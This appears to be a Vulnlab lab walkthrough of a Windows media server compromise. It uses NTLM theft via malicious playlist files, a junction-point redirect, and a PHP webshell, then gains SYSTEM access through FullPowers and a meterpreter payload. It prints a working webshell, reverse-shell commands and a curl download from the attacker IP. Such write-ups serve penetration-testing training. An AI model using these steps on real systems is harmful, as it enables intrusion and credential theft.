VL-Media

Vulnlab Media: Windows Media Player NTLM Theft and Junction Folder Exploitation Walkthrough

This detailed Vulnlab penetration testing walkthrough demonstrates how I successfully compromised a Windows media server through a creative combination of attack vectors. Beginning with reconnaissance that revealed a vulnerable file upload functionality in a web application specifically requesting “Windows Media Player compatible” files, I leveraged NTLM theft techniques by crafting malicious media files (.wax and .asx) to capture and crack the user’s credentials. After gaining initial SSH access, I discovered an automated script that processes uploaded files, which led to identifying a critical path traversal vulnerability using Windows junction points. By redirecting the upload path to the web server’s document root, I deployed a PHP webshell that provided remote code execution capabilities. The privilege escalation phase involved restoring SeImpersonate privileges with FullPowers and ultimately achieving SYSTEM-level access. This technical guide illustrates advanced Windows exploitation techniques including symbolic link abuse, service account manipulation, and privilege escalation methods essential for thorough penetration testing of Windows environments.

Initial Reconnaissance

Initial port scan revealed the following open ports:

1
2
3
4
PORT     STATE SERVICE       REASON          VERSION
22/tcp   open  ssh           syn-ack ttl 127 OpenSSH 
80/tcp   open  http          syn-ack ttl 127 Apache httpd 
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services

Windows Media Player Upload Interface

Initial Access

The target website featured an upload function requesting a “brief introduction video (compatible with Windows Media Player)”. This presented an opportunity to leverage NTLM hash theft.

NTLM Theft Technique

Using ntlm_theft to create malicious media files:

1
2
3
- .wax - via Windows Media Player playlist (Better, primary open)
- .asx – via Windows Media Player playlist (Better, primary open)
- .m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)

I uploaded a .wax or .asx file to the target and set up Responder to capture the NTLM hash:

1
sudo responder -I tun0 -dwv

NTLM Hash Captured

Password Cracking

Once I captured the hash, I used hashcat to crack it:

1
hashcat hash6969.txt /usr/share/wordlists/rockyou.txt

Cracked Hash
Credentials obtained:

  • Username: ENOX
  • Password: <>

System Access

With the credentials, I established an SSH connection:

1
ssh enox@10.10.109.139

Privilege Escalation Research

Upon accessing the system, I discovered a PowerShell script that revealed key information about the system’s operation:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
enox@MEDIA C:\Users\enox\Documents>type review.ps1
function Get-Values {
    param (
        [Parameter(Mandatory = $true)]
        [ValidateScript({Test-Path -Path $_ -PathType Leaf})]
        [string]$FilePath
    )

    # Read the first line of the file
    $firstLine = Get-Content $FilePath -TotalCount 1

    # Extract the values from the first line
    if ($firstLine -match 'Filename: (.+), Random Variable: (.+)') {
        $filename = $Matches[1]
        $randomVariable = $Matches[2]

        # Create a custom object with the extracted values
        $repoValues = [PSCustomObject]@{
            FileName = $filename
            RandomVariable = $randomVariable
        }

        # Return the custom object
        return $repoValues
    }
    else {
        # Return $null if the pattern is not found
        return $null
    }
}

function UpdateTodo {
    param (
        [Parameter(Mandatory = $true)]
        [ValidateScript({Test-Path -Path $_ -PathType Leaf})]
        [string]$FilePath
    )

    # Create a .NET stream reader and writer
    $reader = [System.IO.StreamReader]::new($FilePath)
    $writer = [System.IO.StreamWriter]::new($FilePath + ".tmp")

    # Read the first line and ignore it
    $reader.ReadLine() | Out-Null

    # Copy the remaining lines to a temporary file
    while (-not $reader.EndOfStream) {
        $line = $reader.ReadLine()
        $writer.WriteLine($line)
    }

    # Close the reader and writer
    $reader.Close()
    $writer.Close()

    # Replace the original file with the temporary file
    Remove-Item $FilePath
    Rename-Item -Path ($FilePath + ".tmp") -NewName $FilePath
}

$todofile="C:\\Windows\\Tasks\\Uploads\\todo.txt"
$mediaPlayerPath = "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"


while($True){

    if ((Get-Content -Path $todofile) -eq $null) {
        Write-Host "Todo is empty."
        Sleep 60 # Sleep for 60 seconds before rechecking
    }
    else {
        $result = Get-Values -FilePath $todofile
        $filename = $result.FileName
        $randomVariable = $result.RandomVariable
        Write-Host "FileName: $filename"
        Write-Host "Random Variable: $randomVariable"

        # Opening the File in Windows Media Player
        Start-Process -FilePath $mediaPlayerPath -ArgumentList "C:\Windows\Tasks\uploads\$randomVariable\$filename"

        # Wait for 15 seconds
        Start-Sleep -Seconds 15

        $mediaPlayerProcess = Get-Process -Name "wmplayer" -ErrorAction SilentlyContinue
        if ($mediaPlayerProcess -ne $null) {
            Write-Host "Killing Windows Media Player process."
            Stop-Process -Name "wmplayer" -Force
        }

        # Task Done
        UpdateTodo -FilePath $todofile # Updating C:\Windows\Tasks\Uploads\todo.txt
        Sleep 15
    }

}

Path Traversal Exploitation

I discovered a junction abuse vulnerability in the C:\Windows\Tasks\Uploads\ directory. The system creates MD5 hashes from the “firstnamelastnameemail” of data input to the website during uploads.

Creating a Webshell

First, I created a simple PHP webshell:

1
2
3
4
5
<?php  
  
system($_REQUEST['cmd']);  
  
?>

I then calculated the MD5 hash that would be created:

1
2
echo -n "carlitocarlitocarlito@media.vl" | md5sum
3aab4336940e9c82d5ef05bf40d58b52  -

File Created
After verifying the hash calculation worked correctly, I deleted the folder and created a junction pointing to C:\xampp\htdocs:

1
rmdir C:\Windows\Tasks\Uploads\3aab4336940e9c82d5ef05bf40d58b52
1
mklink /J C:\Windows\Tasks\Uploads\3aab4336940e9c82d5ef05bf40d58b52 C:\xampp\htdocs

After re-uploading the file, the webshell appeared in C:\xampp\htdocs:
Shell in Website

Gaining System Access

I created a HoaxShell session and executed the provided command through our webshell:

1
hoaxshell -s 10.8.5.195 --p 4444
1
/phpshell.php?cmd=powershell -e ......

HoaxShell Connection
I noticed we were running as the Local Service account but without the impersonate privilege. To restore these privileges, I used FullPowers:

1
python3 -m http.server 80
1
curl http://10.8.5.195/FullPowers.exe -o FS.exe

I then created another HoaxShell and executed FullPowers:

1
./FS.exe -c "powershell -e .....

SeImpersonate Privilege

Privilege Escalation to SYSTEM

To escalate to SYSTEM, I used the Meterpreter getsystem command (alternatively, any potato exploit would work):

1
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.8.5.195 LPORT=9091 -f exe -o shell2.exe

Started Metasploit console:

1
set payload windows/x64/meterpreter_reverse_tcp
1
set lport 9091

After obtaining a system session, I simply ran:

1
getsystem

System Shell

https://api.vulnlab.com/api/v1/share?id=396c14c2-aa9d-46a2-a792-68ceea4b179c